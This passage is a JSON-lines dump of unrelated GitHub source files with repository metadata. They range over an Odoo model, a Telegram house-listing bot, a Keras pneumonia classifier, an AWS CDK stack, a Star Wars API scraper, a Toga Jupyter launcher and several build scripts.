area*stdev**2 + area**2*stdev**2/nsky)\n merr.append(1.0857*error/flux) \n\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"felipeji/fji","sub_path":"fji/fji.py","file_name":"fji.py","file_ext":"py","file_size_in_byte":18564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38621857318","text":"from odoo import api, fields, models\n\n\nclass ServiceQuotationFixItemPaymentTermDetail(models.Model):\n _name = \"service.quotation_fix_item_payment_term_detail\"\n _description = \"Service Fix Item Payment Term Detail\"\n _inherit = [\n \"service.fix_item_payment_term_detail_mixin\",\n ]\n\n sequence = fields.Integer(\n string=\"Sequence\",\n required=True,\n default=5,\n )\n term_id = fields.Many2one(\n string=\"Service Payment Term\",\n comodel_name=\"service.quotation_fix_item_payment_term\",\n ondelete=\"cascade\",\n )\n pricelist_id = fields.Many2one(\n string=\"Pricelist\",\n comodel_name=\"product.pricelist\",\n related=\"term_id.service_id.pricelist_id\",\n store=True,\n )\n\n @api.onchange(\n \"currency_id\",\n )\n def onchange_pricelist_id(self):\n pass\n\n def _prepare_contract_data(self):\n self.ensure_one()\n return {\n \"name\": self.name,\n \"product_id\": self.product_id.id and self.product_id.id or False,\n \"account_id\": self.account_id.id,\n \"analytic_account_id\": self.analytic_account_id\n and self.analytic_account_id.id\n or False,\n \"price_unit\": self.price_unit,\n \"uom_quantity\": self.uom_quantity,\n \"uom_id\": self.uom_id.id,\n \"tax_ids\": [(6, 0, self.tax_ids.ids)],\n \"pricelist_id\": self.pricelist_id.id,\n \"currency_id\": self.currency_id.id,\n }\n","repo_name":"open-synergy/opnsynid-service","sub_path":"ssi_service_quotation/models/service_quotation_fix_item_payment_term_detail.py","file_name":"service_quotation_fix_item_payment_term_detail.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6822033072","text":"from telegram import Update, ReplyKeyboardRemove, InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext import ConversationHandler, CallbackContext\n\nfrom costants import WatchType, 
ADMIN_ID\nfrom models.report import Report\nfrom models.user import User\nfrom services.storage import storage\n\n\nasync def start(update: Update, context: CallbackContext) -> int:\n current_user: User = storage.retrieve_user(update.effective_user.id, update.effective_user.username, update.effective_user.first_name, update.effective_user.last_name)\n if context.args and context.args[0] and context.args[0] != current_user.chat_id:\n for user in storage.load():\n if str(user.chat_id) == context.args[0]:\n user.add_follower(str(current_user.chat_id))\n storage.save()\n text = f'Ciao! Sei ora follower di {user.username} e riceverai anche i suoi annunci.'\n await update.message.reply_text(text)\n return ConversationHandler.END\n text = 'Ciao! Ti aiuterò con il monitoraggio di annunci di case. ' \\\n 'Prova a utilizzare i comandi della lista o invia direttamente qui il link di ' \\\n 'una ricerca su un sito di annunci per iniziare. Per info ' \\\n 'consulta la sezione /info.'\n await update.message.reply_text(text)\n return ConversationHandler.END\n\n\nasync def cancel(update: Update, context: CallbackContext) -> int:\n context.chat_data.clear()\n text = 'Operazioni in corso annullate.'\n await update.message.reply_text(text, reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n\nasync def default(update: Update, context: CallbackContext) -> int:\n text = 'Comando non riconosciuto o url non inviato correttamente. ' \\\n 'Prova a utilizzare i comandi della lista o ad inviare l\\'url di una ricerca su un sito di annunci.'\n await update.message.reply_text(text)\n return ConversationHandler.END\n\n\nasync def report(update: Update, context: CallbackContext) -> int:\n query = update.callback_query\n users = storage.load()\n report_data: Report = storage.load_report()\n\n n_users = len(users)\n if n_users > 0:\n counter = [0] * len(WatchType)\n attempts = [0] * len(WatchType)\n status = [True] * len(WatchType)\n total = 0\n per_user_refresh_rate = max(10, int(60 / n_users))\n for user in users:\n for watch in user.watchlist:\n for i, watch_name in enumerate(WatchType):\n if watch_name.value == watch.display_name:\n attempts[i] = max(attempts[i], watch.attempts)\n if watch.status:\n counter[i] += 1\n total += 1\n else:\n status[i] = False\n text = f'*Report dal {report_data.starting_time}*\\n\\n' \\\n f'Utenti: {n_users}\\n'\n resolve_buttons = [\n [\n InlineKeyboardButton(text=f'Azzera statistiche',\n callback_data=\"RESTART_REPORT\")\n ]\n ]\n for i, watch_name in enumerate(WatchType):\n text += f'\\n*{watch_name.value}*\\n'\n text += 'Stato: `OK`\\n' if status[i] else 'Stato: *KO*\\n'\n text += f'Chiamate: {int(counter[i] * (60 / per_user_refresh_rate))} ogni ora\\n'\n text += f'Massimi tentativi: {int(attempts[i])}\\n'\n text += f'Notifiche: {report_data.ads_sent[i]}\\n' if report_data.ads_sent[i] else 'Notifiche: /\\n'\n text += f'Aggiornamento: {report_data.last_update[i]}\\n' if report_data.last_update[i] else 'Aggiornamento: /\\n'\n if not status[i]:\n resolve_buttons.append(\n [\n InlineKeyboardButton(text=f'Riavvia {watch_name.value}',\n callback_data=\"RESTART_WATCH \" + str(i))\n ]\n )\n reply_markup = InlineKeyboardMarkup(inline_keyboard=resolve_buttons)\n if query:\n await query.answer()\n await query.edit_message_text(text, parse_mode='MarkdownV2', disable_web_page_preview=True,\n reply_markup=reply_markup)\n else:\n await update.message.reply_markdown_v2(text, disable_web_page_preview=True, reply_markup=reply_markup)\n return ConversationHandler.END\n else:\n await 
update.message.reply_text('Non ci sono ancora informazioni da visualizzare.')\n return ConversationHandler.END\n\n\nasync def info(update: Update, context: CallbackContext) -> int:\n text = 'Questo bot è stato creato con l\\'intento di aiutare chi come me è alla ricerca ' \\\n 'di una casa\\\\. Spero che possa semplificare la vostra ricerca\\\\. Sarò lieto di ricevere ' \\\n f'vostri feedback o richieste di assistenza\\\\. Buona fortuna\\\\!\\n\\n[Contattami](tg://user?id={ADMIN_ID})'\n await update.message.reply_markdown_v2(text)\n return ConversationHandler.END\n\n\nasync def restart_watch(update: Update, context: CallbackContext) -> int:\n query = update.callback_query\n if query:\n index = int(query.data.split()[1])\n for user in storage.load():\n for watch in user.watchlist:\n for i, watch_name in enumerate(WatchType):\n if watch_name.value == watch.display_name and i == index:\n watch.status = True\n storage.save()\n return await report(update, context)\n else:\n await update.message.reply_text('Si è verificato un errore.')\n return ConversationHandler.END\n\n\nasync def restart_report(update: Update, context: CallbackContext) -> int:\n query = update.callback_query\n if query:\n storage.restart_report()\n return await report(update, context)\n else:\n await update.message.reply_text('Si è verificato un errore.')\n return ConversationHandler.END\n","repo_name":"ammiratafabiano/loft-finder","sub_path":"actions/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31972704559","text":"\"\"\"\nWritten by Jiawei Zhao on 12th of December, 2022 to implemented customized Keras layers \n\"\"\"\n\n#Specifying the image\nImage_Width=224\nImage_Height=224\nBatch_Size = 32\nImage_Size=(Image_Width,Image_Height)\nImage_Channels=3\nHistory_Path = \"../self_CNN_training_history.json\"\nModel_Path = \"../pneumonia_aug_self_CNN.h5\"\n\nimport json\nimport os\nfrom typing import *\nfrom customized_layers import *\nfrom pandas import read_csv\nimport numpy as np\nimport cv2\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom statistics import mean\nfrom keras.models import Sequential, save_model, load_model\nimport tensorflow as tf\nimport keras\nimport keras.backend as K \nfrom keras.optimizers import Adam\nfrom model import create_self_CNN_Model\n\n\n\"\"\"\nMethod for loading train images and test images from disk storage into a \n\"tf.keras.preprocessing.image.DirectoryIterator\" rtype\nand\n\"tf.keras.preprocessing.image.NumpyArrayIterator\" rtype\nrespectively\n\"\"\"\ndef process_input_data(\n input_path:str=\"\", \n img_width:int=Image_Width, img_height:int=Image_Height, img_channels:int=Image_Channels,\n batch_size:int=Batch_Size\n) -> Tuple[any]:\n \n # input parameter assertions\n assert img_width >= 16 and img_height>=16\n assert img_channels in {1, 3, 4}\n assert 16<=batch_size<=256\n \n # ImageDataGenerator objects\n train_datagen = ImageDataGenerator(\n rescale=1./255, \n rotation_range=45, fill_mode='nearest', \n brightness_range = (0.8, 1.25),\n zoom_range= (0.8, 1.25),\n width_shift_range=0.2, height_shift_range=0.2,\n channel_shift_range=50\n )\n \n # only rescaling\n test_datagen = ImageDataGenerator(rescale=1./255)\n \n # This is fed to the network in the specified batch sizes and image dimensions\n train_iterator = train_datagen.flow_from_directory(\n directory=input_path+'train', \n target_size=(img_width, img_height), \n 
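# each image is resized to the network input size before batching\n        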
batch_size=batch_size, \n class_mode='binary', \n shuffle=True\n )\n\n # I will be making predictions off of the test set in one batch size\n # This is useful to be able to get the confusion matrix\n test_data: List[np.ndarray] = []\n test_labels: List[int] = []\n\n for cond in ('/NORMAL/', '/PNEUMONIA/'):\n for img_fname in (os.listdir(f\"{input_path}test_encoded{cond}\")):\n \"\"\"\n Reads the text files into numpy arrays.\n PNG images are returned as float arrays (0-1). \n All other formats are returned as int arrays, with a bit depth determined by the file's contents.\n \"\"\"\n txt_fname = f\"{input_path}test_encoded{cond}{img_fname}\"\n raw_img_array = read_csv(txt_fname, header=None, sep=\" \").to_numpy()\n greyscale_img_array = cv2.resize(raw_img_array, (img_width, img_height))\n # converts one-channel images into three channel images\n rgb_img_array = cv2.merge([greyscale_img_array]*3)\n rgb_img_array = rgb_img_array.astype('float32')\n label = 0 if cond==\"/NORMAL/\" else 1\n test_data.append(rgb_img_array)\n test_labels.append(label)\n \n test_data = np.array(test_data)\n test_labels = np.array(test_labels)\n \n test_iterator = test_datagen.flow(\n test_data, test_labels, \n batch_size=batch_size, \n shuffle=True\n )\n \n return train_iterator, test_iterator\n\n\n\"\"\"\nMethod for fitting and updating the model\n\"\"\"\ndef fitted_own_model(model: Sequential, lr: float, train_imgs: keras.preprocessing.image.DirectoryIterator, val_imgs: keras.preprocessing.image.NumpyArrayIterator) -> Tuple:\n model.compile(optimizer=Adam(learning_rate=lr), loss='binary_crossentropy', metrics=[\"accuracy\"])\n checkpointer = tf.keras.callbacks.ModelCheckpoint(filepath='weights.best.inc.blond.hdf5', verbose=1, save_best_only=True)\n model_history = model.fit(train_imgs, validation_data=val_imgs, steps_per_epoch=len(train_imgs), validation_steps=len(val_imgs), epochs=10, callbacks=[checkpointer])\n return (model, model_history)\n\n\n\"\"\"\nMethod for updating the learning rate\n\"\"\"\ndef obtain_lr(initial_lr: float, total_epochs: int, round_index: int, epochs_per_round: int) -> float:\n assert total_epochs>=10 and total_epochs%10==0, \"The number of datasets must be divsible by 10!\"\n assert 0<(round_index*epochs_per_round)<=total_epochs\n return initial_lr if round_index*epochs_per_round<=total_epochs/2 else initial_lr/4 if round_index*epochs_per_round<=total_epochs*0.8 else initial_lr/20\n\n\n\"\"\"\ntrains \"create_self_CNN_Model()\" here\nutilizes all the aforementioned methods\n\"\"\"\nif __name__ == \"__main__\":\n # train/test image loading\n train_iterator, test_iterator = process_input_data(input_path=\"../\")\n \n # define the dict to store training history\n training_history: Dict[str, List[float]] = {}\n for his_key in ('loss', 'accuracy', 'val_loss', 'val_accuracy'):\n training_history[his_key] = [] \n acc_per_100_epochs: List[float] = []\n\n # define the customized CNN model\n own_model = create_self_CNN_Model(image_size=Image_Size)\n own_model.build((Batch_Size, Image_Width, Image_Height, Image_Channels))\n own_model.summary()\n\n # proper training\n # 100 epochs for each augmented dataset, maximally 500 epochs, stop training when the average validation accuracy of last 10 epochs becomes above 0.9\n stop_training: bool = False\n rounds_per_dataset: int = 10\n for dataset_count in range(1, 6):\n if stop_training: break\n for round_count in range(1, rounds_per_dataset+1):\n lr = obtain_lr(2e-3, 100, round_count, 10)\n print(f'Learning rate for this round is: {str(lr)}')\n 
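# each call below trains ten more epochs and extends the accumulated history\n            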
own_model, history = fitted_own_model(own_model, lr, train_iterator, test_iterator)\n for his_key in history.history.keys():\n training_history[his_key].extend(history.history[his_key])\n sliding_avg_10_acc: float = mean(training_history['val_accuracy'][-10:])\n if sliding_avg_10_acc > 0.9 and training_history['val_accuracy'][-1] > 0.9:\n save_model(own_model, Model_Path)\n stop_training = True \n break\n\n acc = own_model.evaluate(test_iterator, verbose=0)[1]\n print(f\"Updated accuracy after using {str(dataset_count)} augmented training datasets: {round(acc, 4)*100}\")\n save_model(own_model, Model_Path)\n \n # save training history into a .json file at disk storage\n with open(History_Path, \"w\") as f:\n f.write(json.dumps(training_history))\n\n # reload the training history from a .json file\n training_history, own_model = None, None\n K.set_learning_phase(0)\n own_model = load_model(Model_Path, custom_objects={\n 'MyConv2D': MyConv2D,\n 'MyMaxPool2D': MyMaxPool2D,\n 'MyDense': MyDense\n })\n acc = own_model.evaluate(test_iterator, verbose=0)[1]*100\n with open(History_Path, \"r\") as f:\n training_history = json.loads(f.read())\n print(f\"Number of trained epochs until we obtained an accuracy at {round(acc, 2)}: {len(training_history['val_accuracy'])}\")\n","repo_name":"Orthologues/DM873-DeepLearning","sub_path":"pneunomiaXray_toyProject_acc92/py_code/training_main.py","file_name":"training_main.py","file_ext":"py","file_size_in_byte":7126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"22439987414","text":"from constructs import Construct\nfrom aws_cdk import (\n aws_cloudfront_origins,\n Stack,\n aws_iam as iam,\n aws_s3 as s3,\n aws_cloudfront as cf\n)\n\n\nclass CupcakeCdkStack(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n bucket = s3.Bucket(\n self, \n \"cupcake_cms\",\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL\n )\n \n oai = cf.OriginAccessIdentity(self, \"OAI\", comment=\"Connects CF with S3\")\n bucket.grant_read(oai)\n \n distribution = cf.Distribution(\n self,\n \"CDN\",\n minimum_protocol_version=cf.SecurityPolicyProtocol.TLS_V1_2_2018,\n default_behavior=cf.BehaviorOptions(\n allowed_methods=cf.AllowedMethods.ALLOW_ALL,\n origin=aws_cloudfront_origins.S3Origin(\n bucket=bucket,\n origin_access_identity=oai,\n origin_path=\"/\",\n ),\n viewer_protocol_policy=cf.ViewerProtocolPolicy.REDIRECT_TO_HTTPS,\n )\n )\n","repo_name":"ShiedaKayn1975/cupcake-cdk","sub_path":"cupcake_cdk/cupcake_cdk_stack.py","file_name":"cupcake_cdk_stack.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5259632612","text":"import json\nimport requests\n\n\ndef get_resource_page(resource, page):\n \"\"\" Get a single page from the resource. \"\"\"\n # Requests the API data for a specific resource and page number.\n response = requests.get(f\"https://swapi.dev/api/{resource}/?page={page}\")\n # If the status code is 200, meaning the request was successful, return the JSON data.\n if response.status_code == 200:\n return response.json()\n\n\ndef API_scrape(resource, property=None):\n \"\"\" Call the SWAPI and create a list of data. 
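When a property name is given, only that field of each item is collected; otherwise whole records are kept. 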
\"\"\"\n data_list = []\n page = 1\n while True:\n # Calls the function get_resource_page to get data\n data = get_resource_page(resource, page)\n if data is None:\n break\n else:\n # Appends the results to data_list\n filtered_data = data[\"results\"]\n for item in filtered_data:\n # If a property is specified, appends only the property value of each item, else appends the whole item.\n data_list.append(item if not property else item[f'{property}'])\n # Increments the page number\n page += 1\n\n print(f'Successfully fetched {len(data_list)} {resource}.')\n return data_list\n\n\ndef main():\n database = {}\n # Calls API_scrape for each Star Wars category and adds them to database dictionary\n database['starships'] = API_scrape('starships', 'model')\n database['planets'] = API_scrape('planets', 'name')\n database['species'] = API_scrape('species', 'name')\n database['characters'] = API_scrape('people')\n\n file = 'sw_database.json'\n with open(file, 'w') as f:\n # Dumps the database dictionary into a JSON file\n json.dump(database, f)\n\n print('Database saved successfully.')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alinikan/star-wars-character-generator","sub_path":"api_scrape.py","file_name":"api_scrape.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25931427119","text":"from app.models import db, Interview, environment, SCHEMA\nfrom sqlalchemy.sql import text\nfrom datetime import datetime\n\n\ndef seed_interviews():\n\n test_date_str = '2023-12-10'\n test_date = datetime.strptime(test_date_str, \"%Y-%m-%d\").date()\n test_date_str1 = '2023-11-10'\n test_date1 = datetime.strptime(test_date_str1, \"%Y-%m-%d\").date()\n test_date_str2 = '2023-12-02'\n test_date2 = datetime.strptime(test_date_str, \"%Y-%m-%d\").date()\n test_date_str3 = '2023-12-15'\n test_date3 = datetime.strptime(test_date_str1, \"%Y-%m-%d\").date()\n test_date_str4 = '2023-12-20'\n test_date4 = datetime.strptime(test_date_str, \"%Y-%m-%d\").date()\n test_date_str5 = '2023-11-22'\n test_date5 = datetime.strptime(test_date_str1, \"%Y-%m-%d\").date()\n \n\n interview1 = Interview(\n userId=1,\n position='Software Engineer',\n company=\"Amazon\",\n location='New York',\n status='Pending',\n type='Onsite',\n date=test_date\n\n )\n interview2 = Interview(\n userId=1,\n position='Front-end Engineer',\n company=\"Chase\",\n location='New York',\n status='Scheduled',\n type='Onsite',\n date=test_date1\n\n )\n interview3 = Interview(\n userId=2,\n position='Senior Engineer',\n company=\"Bank of America\",\n location='New York',\n status='Pending',\n type='Remote',\n date=test_date2\n\n )\n interview4 = Interview(\n userId=2,\n position='Cloud Engineer',\n company=\"Walmart\",\n location='New York',\n status='Scheduled',\n type='Onsite',\n date=test_date3\n\n )\n interview5 = Interview(\n userId=3,\n position='Cloud Engineer',\n company=\"Netflix\",\n location='New York',\n status='Scheduled',\n type='Remote',\n date=test_date4\n\n )\n interview6 = Interview(\n userId=3,\n position='Cloud Engineer',\n company=\"Facebook\",\n location='New York',\n status='Scheduled',\n type='Remote',\n date=test_date5\n\n )\n db.session.add(interview1)\n db.session.add(interview2)\n db.session.add(interview3)\n db.session.add(interview4)\n db.session.add(interview5)\n db.session.add(interview6)\n db.session.commit()\n\ndef undo_interviews():\n if environment == 'production':\n db.session.execute(f\"TRUNCATE table 
{SCHEMA}.interviews RESTART IDENTITY CASCADE;\")\n    else:\n        db.session.execute(text('DELETE FROM interviews'))\n        db.session.commit()\n\n","repo_name":"ahmad-shaukat/JobSphere","sub_path":"app/seeds/interviews.py","file_name":"interviews.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"70247249850","text":"env = Environment()\n\nenv.Append(CCFLAGS = ['-Werror', '-Wall','-Wextra','-ansi','-pedantic'])\n\nenv.Append(CCFLAGS = ['-DNDEBUG'])\n\nfractions_source_files = Split(\"\"\"\n\tmain_fractions.c\n\tfractions.c\n\t\"\"\")\n\ntablen_source_files = Split(\"\"\"\n\tmain_tablen.c\n\ttablen.c\n\t\"\"\")\n\npropercase_source_files = Split(\"\"\"\n\tmain_propercase.c\n\tpropercase.c\n\t\"\"\")\n\nstripcomments_source_files = Split(\"\"\"\n\tmain_stripcomments.c\n\tstripcomments.c\n\t\"\"\")\n\ndecoder_source_files = Split(\"\"\"\n\tmain_decoder.c\n\tdecoder.c\n\t\"\"\")\n\nlibraries = ['m']\n\nfractions = env.Program(target=\"fractions\", source=fractions_source_files)\ntablen = env.Program(target=\"tablen\", source=tablen_source_files)\npropercase = env.Program(target=\"propercase\", source=propercase_source_files)\nstripcomments = env.Program(target=\"stripcomments\", source=stripcomments_source_files)\ndecoder = env.Program(target=\"decoder\", source=decoder_source_files)\n\nDefault(fractions)\n\n","repo_name":"beentaken/mmeng-personal-work","sub_path":"cs120/lab/10/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"30918948119","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport random\nimport copy\nimport matplotlib.pyplot as plt\nimport timeit\nimport evaluation\nfrom johnson import johnson\nfrom arbre import arbre\nfrom instances import *\n\ndef john_(k, n, m=3, debug=False, d=None, **kwargs):\n    \"\"\"\n    Interface to Johnson's approximate method.\n    Takes an instance type and schedules one instance\n    of that type (n = #tasks, m = #machines).\n    A data set can also be passed in directly.\n    \"\"\"\n\n    if d == None: d = instances_dict[k][0](n, m)\n    if debug: print(d)\n    sol, time = johnson(d)\n    return sol, time\n\ndef arbre_(k, n, m=3, debug=False, d=None, **kwargs):\n    \"\"\"\n    Interface to the exact tree-search method.\n    Takes an instance type and schedules one instance\n    of that type (n = #tasks, m = #machines).\n    A data set can also be passed in directly.\n    An alpha argument may be supplied to get an approximate\n    solution with a quality guarantee (a-approximate)\n    from this method.\n    \"\"\"\n\n    if d == None: d = instances_dict[k][0](n, m)\n    if debug: print(d)\n    pi, piprime = [], np.array(range(np.size(d, 0)))\n    depth, sol = 0, None\n    sol, time = arbre(d, pi, piprime, depth, sol, debug, kwargs.get('alpha',0))\n    return sol, time\n\ndef test(a=0):\n    \"\"\"\n    Checks that the exact method returns makespans\n    no longer than those of Johnson's approximate method.\n    a : quality guarantee (a-approximation) used by\n    the tree-search method.\n    \"\"\"\n\n    ass = []\n    debug = False\n    n, m = 6, 3\n    for k in range(200):\n        k = np.random.randint(len(instances_dict))\n        d = instances_dict[k][0](n, m)\n        sol1, time1 = john_(k, n, m, debug, d)\n        sol2, time2 = arbre_(k, n, m, debug, d, alpha=a)\n        ass.append(int(time1 >= time2))\n    
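# fraction of random trials in which the exact search did at least as well as Johnson's schedule\n    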
print(sum(ass)/len(ass)*100,\"%\")\n\ndef main(algo, max_n, alpha=0):\n    \"\"\"\n    Plots the execution time of a method for each instance type\n    as a function of the number of tasks.\n    algo : name of the method and of its function.\n    max_n : maximum number of tasks in a data set.\n    alpha : used to make the tree-search method approximate. (See that function.)\n    \"\"\"\n\n    print(algo)\n    s = \"from __main__ import {}\".format(algo)\n    tailles = range(1, max_n)\n    exectime = [[timeit.timeit('{}({}, {}, alpha={})'.format(algo, k, n, alpha), number=100, setup=s) for n in tailles] for k in range(len(instances_dict))]\n    fig = plt.figure()\n    ax = plt.subplot(111)\n    for i, c in enumerate(exectime):\n        ax.plot(tailles, c, label='{}'.format(instances_dict[i][1]))\n    ax.legend()\n    plt.ylabel('{}exec_time'.format(algo))\n    plt.xlabel('nb_taches')\n\nif __name__ == \"__main__\":\n    # Prune nodes whose score is 10%\n    # below the score of the current solution\n    a = 0.4\n    # test(a)\n    max_taches = 5\n    #main(john_.__name__, max_taches)\n    main(arbre_.__name__, max_taches, alpha=0)\n    plt.show()\n","repo_name":"nestarz/machine-scheduling","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"7582657430","text":"import asyncio\nimport subprocess\nimport toga\nfrom toga.style.pack import Pack, ROW, CENTER, COLUMN\nimport time\nimport sys\nimport os\nfrom pathlib import Path\nfrom urllib.parse import quote\n\ndef install_dependencies(*args, **kwargs):\n    print(\"Command called\")\n    import subprocess\n    subprocess.call(\"pip install numpy\", shell=True)\n    print(\"Success\")\n    # stdout, stderr = await proc.communicate()\n\n    # print(f'[{cmd!r} exited with {proc.returncode}]')\n    # if stdout:\n    #     print(f'[stdout]\\\n{stdout.decode()}')\n    # if stderr:\n    #     print(f'[stderr]\\\n{stderr.decode()}')\n\nclass Notebook(toga.Document):\n    def __init__(self, filename, app):\n        super().__init__(filename=filename, document_type='Jupyter Notebook', app=app)\n\n        self.window = toga.Window(title=filename, size=(768,768))\n        self.window.on_close = self.close_window\n        self.webview = toga.WebView(style=Pack(flex=1))\n        self.window.content = self.webview\n\n    def close_window(self):\n        self.proc.kill()\n\n    def read(self):\n        asyncio.ensure_future(self.start_jupyter(self.filename))\n\n    def show(self):\n        self.window.show()\n\n    async def start_jupyter(self, filename):\n        filename = Path(filename)\n        command = '{} -m notebook --NotebookApp.token=\"\" --NotebookApp.open_browser=False --notebook-dir=\"{}\"'.format(sys.executable, filename.parent)\n        self.proc = await asyncio.create_subprocess_shell(\n            command,\n            stdin=None,\n            stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE,\n        )\n        line = await self.proc.stderr.readline()\n        while line:\n            line = line.strip().decode('utf-8')\n            if 'http' in line:\n                url = line.split(' ')[-1]\n                url = \"{}notebooks/{}\".format(url, quote(filename.name))\n                self.webview.url = url\n            line = await self.proc.stderr.readline()\n\n\nclass Hera(toga.DocumentApp):\n\n    def __init__(self):\n        resource_dir = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n        super().__init__(\n            'Hera',\n            document_types={'ipynb': Notebook},\n        )\n        os.environ['PIP_TARGET'] = str(self.paths.data / 'pkgs')\n        sys.path.append(str(self.paths.data / 'pkgs'))\n        os.environ['PYTHONPATH'] += ':' + str(self.paths.data / 'pkgs')\n        print(os.environ['PYTHONPATH'])\n\n        cmd1 = 
toga.Command(\n install_dependencies,\n label='Install packages',\n tooltip='Installs some helpful packages',\n shortcut=toga.Key.MOD_1 + 'i',\n icon='icons/pretty.png',\n group=toga.Group.FILE,\n section=0\n )\n\n self.commands.add(cmd1)\n\n def startup(self):\n pass\n\ndef main():\n Hera().main_loop()\n\n\nif __name__ == '__main__':\n main()","repo_name":"phildini/hera","sub_path":"hera/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"77"} +{"seq_id":"15004480453","text":"from rest_framework import serializers\nfrom cars.models import Car\nfrom saves.models import Save\nfrom biddings.models import Bidding\n\n\nclass CarSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n is_owner = serializers.SerializerMethodField()\n profile_id = serializers.ReadOnlyField(source='owner.profile.id')\n profile_image = serializers.ReadOnlyField(source='owner.profile.image.url')\n save_id = serializers.SerializerMethodField()\n bidding_id = serializers.SerializerMethodField()\n saves_count = serializers.ReadOnlyField()\n biddings_count = serializers.ReadOnlyField()\n comments_count = serializers.ReadOnlyField()\n\n def validate_image(self, value):\n if value.size > 2 * 1024 * 1024:\n raise serializers.ValidationError('Image size larger than 2MB!')\n if value.image.height > 4096:\n raise serializers.ValidationError(\n 'Image height larger than 4096px!'\n )\n if value.image.width > 4096:\n raise serializers.ValidationError(\n 'Image width larger than 4096px!'\n )\n return value\n\n def get_is_owner(self, obj):\n request = self.context['request']\n return request.user == obj.owner\n\n def get_save_id(self, obj):\n user = self.context['request'].user\n if user.is_authenticated:\n save = Save.objects.filter(\n owner=user, car=obj\n ).first()\n return save.id if save else None\n return None\n\n def get_bidding_id(self, obj):\n user = self.context['request'].user\n if user.is_authenticated:\n bidding = Bidding.objects.filter(\n owner=user, car=obj\n ).first()\n return bidding.id if bidding else None\n return None\n\n class Meta:\n model = Car\n fields = [\n 'id', 'owner', 'is_owner', 'profile_id',\n 'profile_image', 'created_at', 'updated_at',\n 'title', 'content', 'year', 'km', 'price', 'image',\n 'image2', 'image3', 'image4', 'image_filter',\n 'save_id', 'bidding_id', 'saves_count', 'biddings_count',\n 'comments_count'\n ]\n","repo_name":"MustafaSahinci/pp5-backend","sub_path":"cars/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34784712199","text":"def merge(list1, list2):\n i = 0\n j = 0\n ans = []\n while i < len(list1) and j < len(list2):\n if list1[i] < list2[j]:\n ans.append(list1[i])\n i += 1\n else:\n ans.append(list2[j])\n j += 1\n while j < len(list2):\n ans.append(list2[j])\n j += 1\n while i < len(list1):\n ans.append(list1[i])\n i += 1\n return ans\n\n\ndef mergesort(lst):\n if len(lst) == 1:\n return lst\n return merge(mergesort(lst[:len(lst) // 2]), mergesort(lst[len(lst) // 2:]))\n\nprint(mergesort([10,1,2,3,13]))\n","repo_name":"awemipt/pythonBasic","sub_path":"lesson7/lesson7.7/step8.py","file_name":"step8.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5249870530","text":"# 
Задайте последовательность чисел. Напишите программу, которая\n# выведет список неповторяющихся элементов исходной последовательности.\n\nfrom random import randint as rnd\n\n\ndef fill_array(arr):\n for i in range(len(arr)):\n arr[i] = rnd(0, len(arr))\n print('Cписок всех элементов: ', '\\n', arr)\n\n\ndef order(arr):\n num = []\n for i in range(len(arr)):\n if arr.count(arr[i]) == 1:\n num.append(arr[i])\n print('Cписок неповторяющихся элементов: ', '\\n', num)\n\n\nn = int(input('Введите размер последовательности: '))\nnumbers = ['']*n\nfill_array(numbers)\nprint('Cписок однократно повторяющихся элементов: ', '\\n', list(set(numbers)))\norder(numbers)\n","repo_name":"EvgenyVarlamov/Py_HomeWorkFolder_004","sub_path":"Hometask003.py","file_name":"Hometask003.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23090128138","text":"#!/usr/bin/env python3\n\ntop = '..'\n\nimport sys\n\ndef build(bld):\n def w32_flags(bld, target):\n return ''\n if bld.env.PLATFORM == 'win32':\n return '-Wl,--out-implib,{0}.a'.format(target)\n else:\n return ''\n\n plugins = ['Reverser', 'Tapestop', 'Crush', 'Repeat']\n formats = [('ladspa', 'bitrot_{0}'), ('vst', 'bitrot_{0}_vst')]\n bundle = 'bitrot.lv2'\n\n import os.path\n import inspect\n ttlgen = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))\n ttlgen = os.path.join(ttlgen, 